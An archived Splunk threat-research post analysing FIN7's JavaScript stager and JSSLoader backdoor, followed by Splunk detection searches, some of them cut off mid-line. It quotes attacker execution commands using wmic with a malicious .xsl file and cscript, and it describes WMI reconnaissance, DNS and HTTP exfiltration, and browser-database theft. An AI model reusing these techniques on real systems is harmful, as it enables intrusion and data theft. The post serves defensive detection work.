{
	"id": "edff2cb7-cd6a-4200-ba9d-df2761c69ede",
	"created_at": "2026-04-10T03:20:37.78844Z",
	"updated_at": "2026-04-10T03:22:18.087476Z",
	"deleted_at": null,
	"sha1_hash": "b88df62e1d48b99a55146de141270aef82bc9470",
	"title": "FIN7 Tools Resurface in the Field – Splinter or Copycat? | Splunk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4626126,
	"plain_text": "FIN7 Tools Resurface in the Field – Splinter or Copycat? | Splunk\r\nBy Splunk Threat Research Team\r\nPublished: 2021-11-11 · Archived: 2026-04-10 02:32:22 UTC\r\nT his blog is part 1 and covers FIN7, a highly-skilled group, and the two tools. To find a walkthrough of Remcos\r\nexecuted via Splunk's Attack Range Local, check out part 2, Detecting Remcos Tool Used by FIN7 with Splunk.\r\nFIN7 is a well-organized criminal group composed of highly-skilled individuals that target financial institutions,\r\nhospitality, restaurant, and gambling industries. Until recently, it was known that high-level individuals of this\r\ncriminal enterprise were arrested — specifically 3 of them — and extradited to the United States.\r\nThis criminal group performed highly technical malicious campaigns which included effective compromise,\r\nexfiltration and fraud using stolen payment cards. Another heist related to the history of this group and actors\r\nincludes withdrawing money from ATMs, bypassing all controls as seen in the video linked below.\r\nSource: Mario Mazzochi ATM Carbanak Attack\r\nCarbanak and FIN7 are usually referred to as the same group, although some security researchers believe they\r\nmight be two groups using the same malware and should be tracked separately. Without delving deeper into the\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 1 of 16\n\nassumptions of being two different groups, however, we can take a look at their tools which is what we can\r\nmeasure via payload samples and research from the community.\r\nFIN7 is a particular group highly specialized in targeting specific verticals. These individuals carefully and\r\nthoroughly pretexted and pursued their victims in some cases to establish rapport via conversations in order to lure\r\ntheir victims into clicking on their malicious payloads.\r\nSource: DOJ\r\nAccording to the Department of Justice, FIN7 group stole approximately 15 million cards in the United States.\r\nThis group was significantly successful in its criminal enterprise, including the creation of an apparent\r\nInformation Security Technology company where they kept track of their victims using off-the-shelf software like\r\nAtlassian JIRA.\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 2 of 16\n\nDue to the notoriety, extent and sophistication of this group and the tools they use, we are going to particularly\r\nfocus on FIN7 tools, techniques and procedures. Recently, a specific tool which is a signature of this group known\r\nas the JSS loader has apparently resurfaced, indicated by reports from some security research sites and mentioned\r\nin some security publications.\r\nBased on previous arrests of what was thought to be some of the main characters of this organization, we need to\r\nask ourselves: is this a splinter from a former group trying to get business back online, or is this a copycat using\r\nthe former tools, rewriting them and even attempting to reuse former infrastructure from past campaigns? Or\r\nbasically, the group was indeed not affected by arrests and decided to lay low and then reappear as reported\r\nrecently by Recorded Future.\r\nWe do not have enough information to respond to the above questions, however, we can prepare ourselves to\r\ndefend against this group by looking at their tools.\r\nIn this two-part blog we are going to address two tools used by this group — JSS Loader and Remcos.\r\nFIN7 Javascript\r\nFIN7 is well known to use a spear-phishing campaign to compromise a machine by downloading or executing an\r\nobfuscated javascript as the first stage. We analyze old and the latest script found in the wild to summarize all\r\npossible behavior it may execute in the targeted machine.\r\nJavascript Execution Using .XSL File\r\nOne interesting behavior we saw in one of these variants is how it executes the malicious javascript. First it will\r\ncreate a copy of legitimate wmic.exe in “user\\public” folder, as well as the .xsl file that will be executed using\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 3 of 16\n\ncommand “wmic os get /format:”\u003cmalicious\u003e.xsl”. Then the .xsl will execute the actual malicious javascript in\r\nthe .txt file extension. Below is the screenshot of that .XSL file.\r\nWe can also see how it uses the cscript.exe application to execute the malicious javascript by using the command\r\n“cscript //e:jscript ibivigi.txt”.\r\nThis JS is capable of gathering information to the compromised host by executing several WMI query commands.\r\nBelow is the WMI query we saw during our analysis.\r\nAside from the table above, it queries wmi “Win32_OperatingSystem” to check several items like in the\r\nscreenshot below.\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 4 of 16\n\nIt checks if the host has an enabled UAC by querying the “EnableLua” Registry and saves the output as part of its\r\ndata gathering.\r\nIt will also try to gather AD information by running ActiveXObject “ADSystemInfo” to check if the host is part of\r\nthe domain or not.\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 5 of 16\n\nData Exfiltration\r\nAfter gathering all that information, it will be encrypted and sent to its C2 server using the HTTP POST Request\r\ncommand.\r\nWe also found some variants where it uses DNS exfiltration of data. With this feature, it will encrypt first all the\r\ngathered data, encode it to base64, then query the C2 DNS server using nslookup application with the encoded\r\ndata to it. The command is shown in the figure below.\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 6 of 16\n\nJSSLoader\r\nFIN7 also has some binary backdoor tools that will do a collection of data from the compromised host and send it\r\nto its C2 server. Some variants of JSSloader are compiled to .NET and some are in C++.\r\nC2 Server Communication\r\nIn both JSSloader samples, we've seen that it is capable of communicating to its C2 server to request for\r\ncommands and exfiltrate collected data from the compromised machine. Below is the user-agent it uses in those\r\nsamples:\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 7 of 16\n\n.NET compiled of JSSloader\r\nJSSloader compiled C++\r\nCollection of Data\r\nLike the obfuscated JScript it is also capable of collecting data by using WMI query in\r\n“Win32_ComputerSystem”, “Win32_Product” and “Win32_Process”.\r\nAdditionally, both variants have a function that will list all the files on the desktop of the compromised host that\r\nwill also send to its C2 server.\r\nJSSloader Compiled .NET\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 8 of 16\n\nC++ compiled JSSloader\r\nThere is also a feature in the .net version of JSSloader where it runs Windows command-line tools like\r\nipconfig.exe and systeminfo.exe then pipe the output to another function that collects and exfiltrates data.\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 9 of 16\n\nTaking a Screenshot\r\nAnother feature identified is taking a screenshot of the compromised host. The screenshot image will not be\r\ndropped on the disk; rather, it will be saved in a memory stream that will be encoded to base64 and sent to its C2\r\nserver.\r\nParsing Browser Databases\r\nIt also has some functions that parse the browser information like history and URL visits of users in both Chrome\r\nand Firefox applications. This is done by accessing the SQLite database of those browsers and executing SQL\r\nqueries to its database.\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 10 of 16\n\nParsing Chrome history\r\nParsing Firefox URL visited\r\nDetections\r\nJscript Execution Using Cscript App (New)\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where (Processes.parent_process_name = \"cscript.exe\" AND Processes.parent_process = \"*//e:jscript*\") OR (Proce\r\n by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processe\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 11 of 16\n\nXSL Script Execution With WMIC (New)\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process = \"*os get*\" Processes.process=\"*/format:*\" Processes.process = \"*.xsl*\"\r\n by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processe\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nNon-Chrome Process Accessing Chrome Default Dir (New)\r\n`wineventlog_security` EventCode=4663 NOT (process_name IN (\"*\\\\chrome.exe\", \"*\\\\explorer.exe\", \"*sql*\")) Objec\r\n| stats count min(_time) as firstTime max(_time) as lastTime by Object_Name Object_Type process_name Access_Mask\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 12 of 16\n\n| `security_content_ctime(firstTime)`\r\n| `security_content_ctime(lastTime)`\r\nNon-Firefox Process Access Firefox Profile Dir (New)\r\n`wineventlog_security` EventCode=4663\r\n NOT (process_name IN (\"*\\\\firefox.exe\", \"*\\\\explorer.exe\", \"*sql*\")) Object_Name=\"*\\\\AppData\\\\Roaming\\\\Mozilla\r\n | stats count min(_time) as firstTime max(_time) as lastTime\r\n by Object_Name Object_Type process_name Access_Mask Accesses process_id EventCode dest user\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nOffice Application Drop Executable Unit Test (New)\r\n`sysmon` EventCode=11 Image IN (\"*\\\\winword.exe\",\"*\\\\excel.exe\",\"*\\\\powerpnt.exe\",\"*\\\\mspub.exe\",\"*\\\\visio.exe\"\r\n TargetFilename IN (\"*.exe\",\"*.dll\",\"*.pif\",\"*.scr\",\"*.js\",\"*.vbs\",\"*.vbe\",\"*.ps1\") AND NOT(TargetFilename IN (\r\n | stats count min(_time) as firstTime max(_time) as lastTime by Image TargetFilename ProcessGuid dest user_id\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 13 of 16\n\n| `security_content_ctime(firstTime)`\r\n |`security_content_ctime(lastTime)`\r\nCmdline Tool Not Executed In CMD Shell (New)\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where (Processes.process_name = \"ipconfig.exe\" OR Processes.process_name = \"systeminfo.exe\")\r\n AND NOT (Processes.parent_process_name = \"cmd.exe\" OR Processes.parent_process_name = \"powershell*\" OR Process\r\n by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processe\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nCheck Elevated CMD using whoami (New)\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process = \"*whoami*\" Processes.process = \"*/group*\" Processes.process = \"* find *\" Processes.\r\n by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.p\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 14 of 16\n\nMS Scripting Process Loading WMI Module (New)\r\n`sysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\fastprox.dll\", \"*\\\\wbem\r\n| stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count\r\n by Image EventCode process_name ProcessId ProcessGuid Computer | where count \u003e= 5\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nMS Scripting Process Loading Ldap Module (New)\r\nsysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\Wldap32.dll\", \"*\\\\adsldp\r\n| stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count\r\n by Image EventCode process_name ProcessId ProcessGuid Computer | where count \u003e= 2\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nContributors\r\nWe would like to thank the following for their contributions to this post:\r\nTeoderick Contreras\r\nRod Soto\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 15 of 16\n\nSource: https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html"
	],
	"report_names": [
		"fin7-tools-resurface-in-the-field-splinter-or-copycat.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775791237,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b88df62e1d48b99a55146de141270aef82bc9470.pdf",
		"text": "https://archive.orkl.eu/b88df62e1d48b99a55146de141270aef82bc9470.txt",
		"img": "https://archive.orkl.eu/b88df62e1d48b99a55146de141270aef82bc9470.jpg"
	}
}